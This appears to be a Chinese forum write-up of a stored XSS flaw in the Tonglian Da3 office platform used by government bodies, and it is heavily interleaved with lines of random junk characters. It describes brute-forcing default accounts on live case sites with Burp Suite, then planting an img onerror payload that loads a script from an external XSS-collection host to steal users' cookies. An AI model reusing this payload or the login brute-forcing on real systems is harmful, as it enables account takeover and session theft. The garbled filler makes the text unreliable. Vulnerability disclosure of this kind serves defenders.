+ ~/ Y" a$ k! v G( N$ j( ?
8 p! Z) f1 p3 U, K: R1 Z; m& T; e 同联Da3协同办公平台后台通用储存型xss漏洞
, J8 K& y1 d* l+ W! r! J* d
. R7 q: l9 S2 Q
; X" F2 P2 ^ ^ O5 r$ Z2 F/ N% L 平台简介:
! v+ k+ O1 V( D% R; p
. M, T# g( G( Y3 X* P
, W' h8 @) J3 e9 }) b S
! c, p, ~/ P4 f1 I" B. \; j
" h. {, M2 Z( z& s ' i5 |9 }* V+ q9 `
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ k& u8 z' I7 M8 M2 [' y8 U8 a
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. o1 c3 U) f# b; T, ]/ Y同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
1 G% v* g& r) e7 k& i) E
& |4 b, U) B) J; V/ _ f( C/ Z- w! k+ I
- N: N' q& ?! S+ Z4 Z* R
8 m. Y' n* i" C2 }- z u0 ]: k
/ m' I4 C. A0 Q- I4 h$ H
7 M6 k) {# i' ?, I0 \
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
* s; x, t: H4 s; I) I
, \1 n4 F. c& W0 X( G
& U8 D T" J6 A7 E0 o" \: j A( `3 { ' g0 `2 N4 |- e3 |2 }7 \
0 F2 V# l5 P. q9 q0 n, M8 {0 W
2 z" x7 p$ i5 K( I* e9 M" D- ^
http://1.1.1.1:7197/cap-aco/#(案例2-)
8 ]; W- m& r6 A1 h5 p
9 A# M: x% t! W0 S, b3 S1 t
9 y% M1 o1 C- J http://www.XXOO.com (案例1-官网网站)
+ Q* \( s* C' n- h2 n. m
: V0 @, p) p1 h
" Z8 J& [- _* P' A7 D% f8 b! ?: H 漏洞详情:' W7 W! x5 Y; O' u( [5 F
, E$ B; o4 Q4 f
! ]* g! J A/ N6 @% z( A) u( Z 案例一、
( v( M3 w' b/ h
1 Y- S$ v8 x6 M
9 N4 [% u9 ~# l+ ^( Q! h 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
) y! l* e& Q ^+ m$ E
8 R( T7 }& V* `) w4 y) F
) |7 e" k0 W7 l+ |5 W 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:5 E# t t) G! T/ M X: A
( X9 E% y7 L* ^( a3 w. R9 o x . ]& ~* h/ y/ F1 b
+ Z% \; n' r- h5 E. P
' q) {- b& f: |$ F% Y9 F j. v0 q0 _, P0 u- R
/ J% y, x& ?) m/ ^# A% ?
4 U8 S: p3 ?' g$ ~' A - O6 Q+ ?2 n2 R2 G0 [* `+ i3 `
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
% _& c( ?: i7 a1 T
& ~1 [2 ^* I7 e, s( ?+ Y
" K* d9 q- c1 l' L3 \: E
& l1 L0 \ b6 t# J; T
& ~4 {( _: F( \& ^- ^
4 V; \7 ^/ W0 H* P' u- S; W
( h+ w! p, b/ d, p
$ ?/ P! N7 L+ Q2 {3 M! i
+ X# V- u3 y! v5 ]6 z; F
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
9 k5 d5 s) W1 u( D
( ~4 |) L/ B! r7 h, Y2 `
) X0 m& r3 [ Y3 p& X/ }' F, i, v - v* C8 i1 X% E7 f4 g$ K. I6 G
; T1 Z' x/ M0 i; i( s; `+ w
! e# o. `: {% \ <img src=x
3 W, u& W- I' _) z' I9 ~onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
* G/ S& u) k4 V6 c y
7 e F: ?" ?+ j/ e# d; X. v4 G8 l
- |3 X! k7 V. i+ Y& h) W
2 a2 V" f. T: A& g$ D' F6 N! L
7 R1 t: M1 Y# T
" S/ r$ a( M# t 然后发送,接收cookie如图: 6 |5 C B' h* m3 B
. w0 s; M& _0 s1 T- b
8 l: V% Z+ c1 e; m6 ?; i, \- o
0 A4 l& {5 D: M2 M
7 y7 x0 c% W% v l+ `: f6 F3 n
: } R+ Z, H3 K0 R2 @. s
6 k( F7 J9 E3 v4 M0 [+ D9 h
[9 p8 j: @. _
( q9 o3 A; C" u$ z
0 N7 [: s5 c( |. Y# r
3 O1 D1 ~+ g$ M7 _/ y( E
3 m5 z0 @+ x- N/ Y. c% l9 T. h # d7 E; I3 c3 e( {0 Q- k8 t6 a
: n( L' y( w& }3 k' j- Z
. c3 a' t' t! N
3 k! k4 _* w% o; p2 X/ a! Q
0 t" j9 k- c$ u5 F# M' A
/ H- g. O5 |* m5 r- o' p* }
* c2 U: I9 v! R1 e& w/ z
- i" N& V1 [; g. c& o( P
0 f, B* T4 ]% j, ^* h# _
" _, _& o. h! [& D% n
: @1 K4 F8 q& n8 {# J
8 \6 W( `) |, I, `4 x1 D6 p8 k 案例2、 ' y- C) F3 d4 X$ O; h9 {1 ^/ ?: n
6 p0 }' ?# R. r1 R/ u 0 U: ~4 ]+ w9 ]4 |' L w8 j
前面步骤都一样,下面看效果图: ' ^( @. }9 h2 I+ t
: G" g6 b& I8 Q1 i' I' _
8 o3 U6 \0 d3 G
& E2 N/ C$ r: H% s0 s
' `) f( ^ Y/ t
4 f& R5 S I* x3 ]
' V0 g9 g7 c* r! U5 }
! |+ P+ e% j) A
% i( I# M2 I3 j+ W/ ` 5 A6 f3 T& d' L) v4 p
' P. @) e, r7 { A% k( z/ D
$ `9 i; y" ?; [1 v# x
1 g+ l3 s0 c# _: V+ ~4 }- y$ u
) p% s; L2 [5 V
7 j1 h. z% v: p% i. X8 H
- m! j3 d2 f- o: {9 l* p
" q% X$ B% W; n' W
; \. Y4 `' M0 \; s2 O# `
! c3 \3 D8 w, ]. {" i5 I8 Z( M) G
1 Y/ E5 ~5 G2 d0 W
$ i' C8 o3 D5 Y! W5 J: f' ]( Z
7 Z- E8 ^' W; l7 I4 \
# u. j3 C6 }! C* d
8 z3 w$ n I* R- {$ m
7 R5 s3 `; ^6 I* X
6 ~" z- t$ T# q$ K1 S3 {6 n8 Y
& n$ T' f% v# P0 ` & J% w2 O' A) Y' f- P' I
; r( b# j0 ^- m1 r8 \! }+ d